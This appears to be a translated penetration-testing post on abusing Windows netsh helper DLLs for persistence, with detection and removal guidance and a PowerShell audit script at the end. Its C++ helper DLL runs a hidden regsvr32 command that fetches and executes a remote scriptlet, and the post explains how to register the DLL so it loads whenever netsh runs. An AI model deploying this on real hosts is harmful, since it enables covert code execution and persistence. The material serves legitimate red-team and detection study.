About:

  • Common commands of netsh
  • Matthew Demaske's method of using netshell to execute malicious DLLs and maintain persistence on a host
  • Write a DLL with the InitHelperDll function
  • How to use
  • Detection

Table of Contents:

  • Introduction to common commands of netsh
  • Testing Matthew Demaske's shared method—using netshell to execute malicious DLLs and maintain persistence on a host
  • How to write a helper DLL in C++ with the export function InitHelperDll
  • Practical exploitation testing
  • Defense and detection

Reference:

http://www.adaptforward.com/2016/09/using-netshell-to-execute-evil-dlls-and-persist-on-a-host/

0x00 Introduction

---

In penetration testing, using commands natively supported by the system can often bypass various detections and interceptions. For example, in my article 'Use bitsadmin to maintain persistence and bypass Autoruns', I introduced how to leverage the system's native bitsadmin tool to achieve persistence and evade detection by Autoruns.

Matthew Demaske recently shared a method he discovered, which similarly utilizes commands natively supported by the system—using netshell to execute evil DLLs and persist on a host. This article will organize his method and supplement the DLL writing techniques not covered in detail in the original post.

0x01 Introduction to netsh

---

Netsh is a powerful network configuration command-line tool provided by the Windows operating system. Common commands include:

View IP configuration information:


View network configuration files:

Enable/disable network adapters:

View all TCP connections:


Set local IP, subnet mask, and gateway IP:

Check firewall status:


Enable/disable firewall:



Enter 'netsh /?' to view more detailed command help. Notably, the 'add' command is worth attention. Enter 'netsh add /?' for more details:

```
netsh add /?

The following commands are available:

Commands in this context:
add helper     - Installs a helper DLL.
```



What would happen if we add a test DLL here?


## 0x02 Writing a Helper DLL
---
Each helper DLL must export a function named InitHelperDll.

Once a helper DLL has been added, netsh calls its exported InitHelperDll every time netsh starts and initializes its helpers.

Example of InitHelperDll (the MSDN sample, with the helper GUID and start routine it references declared so the fragment compiles):

```cpp
#include <windows.h>
#include <netsh.h>

// The MSDN sample defines these elsewhere: the GUID that identifies this helper
// and the start routine netsh invokes after the helper has been registered.
extern GUID g_MyGuid;
DWORD WINAPI NetshStartHelper(const GUID *pguidParent, DWORD dwVersion);

DWORD WINAPI InitHelperDll(DWORD dwNetshVersion, PVOID pReserved)
{
    NS_HELPER_ATTRIBUTES attMyAttributes;
    ZeroMemory(&attMyAttributes, sizeof(attMyAttributes)); // leave pfnStop etc. NULL
    attMyAttributes.guidHelper = g_MyGuid;
    attMyAttributes.dwVersion  = 1;
    attMyAttributes.pfnStart   = NetshStartHelper;
    // NULL parent GUID registers this as a top-level helper.
    RegisterHelper(NULL, &attMyAttributes);
    return NO_ERROR;
}
```




For details on InitHelperDll, refer to the following link:

https://msdn.microsoft.com/en-us/library/windows/desktop/ms708327(v=vs.85).aspx


The article 'Code Execution of Regsvr32.exe' already covered how to add an exported function to a DLL, so only a brief walkthrough follows:



Create a new C++ DLL project and add the following to the main source file:

```cpp
#include <windows.h>

// Entry point netsh calls when it loads the helper DLL.
DWORD WINAPI InitHelperDll(DWORD dwNetshVersion, PVOID pReserved)
{
    // Payload from the original post: regsvr32 loads a remote .sct (URL placeholder left as in the post)
    const char *command = "cmd.exe /c start regsvr32.exe /s /n /u /i:https://raw.githubusercontent.某开源项目.sct scrobj.dll";
    WinExec(command, SW_HIDE);
    return 0;
}
```


Add the export declaration as a module-definition file:

  • File type: Text File
  • Name: the same name as the project, with a `.def` extension

Its content:

```
EXPORTS
InitHelperDll
```





Then compile the project.

**Note:**

Marc Smeets shared his POC code, defining export functions using another method:

```cpp
extern "C" __declspec(dllexport) DWORD InitHelperDll(DWORD dwNetshVersion, PVOID pReserved)
```


The payload creates a new thread to execute shellcode

**Project repository is as follows:**

https://github.com/outflankbv/NetshHelperBeacon


## 0x03 Adding a custom helper DLL
---
**Note:**

Administrator privileges are required

Add via cmd:

[Figure: adding the helper DLL from cmd]

At the same time, the corresponding registry value is created:

[Figure: the new value under the NetSh key]

  • Location: `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh`
  • Name: `netshtest`
  • Type: `REG_SZ`
  • Data: `c:\test\netshtest.dll`

Note:

Writing this value directly into the registry has the same effect as adding the helper DLL with `netsh add helper`.

0x04 Trigger backdoor

---

Once the helper DLL has been added, netsh loads c:\test\netshtest.dll every time it is run.

As shown in the figure, running any netsh command loads c:\test\netshtest.dll, which launches the calculator:

[Figure: netsh launching calc.exe]

Verification:

  • Use Process Explorer to view the DLLs loaded by the netsh process:

[Figure: Process Explorer showing netshtest.dll loaded in netsh.exe]

  • The load can also be seen in Process Monitor, in the Event Properties of the process event:

[Figure: Process Monitor event for the DLL load]

0x05 Persistence

---

  • Since netsh is a commonly used system command, there is a probability that it will be used normally by users, so simply launching netsh can trigger the payload.
  • If added as a common startup item, it is also quite deceptive because only netsh.exe is displayed as starting.

0x06 Detection

---

Monitor the registry location `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh`.

Note:

  • The `netsh show helper` command cannot detect newly added helper DLLs.
  • Be aware of whether normal DLLs in the registry have been replaced.

0x07 Removal

---

Via cmd:


Via registry:

0x08 Summary

---

  • The prerequisite for Netsh Persistence is that administrator privileges have already been obtained.
  • Some VPN software calls the netsh command during startup, which solves the self-starting issue of Netsh Persistence. This method is worth testing.
  • If netsh is found in the startup items, it is worth noting, and it is necessary to check whether the corresponding registry key contains malicious helper DLLs.
  • The default key values under the registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh differ across systems, requiring comparison to determine if the default key values have been tampered with.
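The detection points above (monitoring the NetSh registry key, which `netsh show helper` does not reveal) and the baseline comparison suggested in the summary can be combined into one audit script. This is an added example, not code from the original post; it assumes an elevated PowerShell session on Windows and a hypothetical baseline file exported once from a known-clean system of the same build.

```powershell
# Added example: audit HKLM\SOFTWARE\Microsoft\NetSh for suspicious helper DLL entries.
# Assumption: $BaselineFile (hypothetical path) holds one known-good value name per line.
$KeyPath      = 'HKLM:\SOFTWARE\Microsoft\NetSh'
$BaselineFile = 'C:\baseline\netsh-helpers.txt'

$baseline = @()
if (Test-Path $BaselineFile) {
    $baseline = Get-Content $BaselineFile |
        ForEach-Object { $_.Trim().ToLower() } | Where-Object { $_ }
}

$system32 = (Join-Path $env:SystemRoot 'System32').ToLower()
$key      = Get-Item $KeyPath

foreach ($name in $key.GetValueNames()) {
    $data = [string]$key.GetValue($name)

    # Default entries are bare file names that netsh resolves through the loader
    # search path; make the location explicit so a full path outside System32
    # (like c:\test\netshtest.dll in the post) stands out.
    $resolved = if ([IO.Path]::IsPathRooted($data)) { $data } else { Join-Path $system32 $data }

    $flags = @()
    if ($baseline.Count -gt 0 -and ($baseline -notcontains $name.ToLower())) { $flags += 'NOT-IN-BASELINE' }
    if (-not $resolved.ToLower().StartsWith($system32)) { $flags += 'OUTSIDE-SYSTEM32' }

    if (Test-Path $resolved) {
        # A replaced default DLL (the second note in 0x06) usually loses its Microsoft signature.
        $sig = Get-AuthenticodeSignature -FilePath $resolved
        if ($sig.Status -ne 'Valid') { $flags += "SIG-$($sig.Status)" }
    } else {
        $flags += 'FILE-MISSING'
    }

    [pscustomobject]@{
        Name     = $name
        Data     = $data
        Resolved = $resolved
        Flags    = ($flags -join ',')
    }
}
```

Any row with a non-empty Flags column deserves a look; a confirmed rogue entry can be removed with `Remove-ItemProperty -Path $KeyPath -Name <value name>`, which undoes the registration the same way deleting the value by hand does.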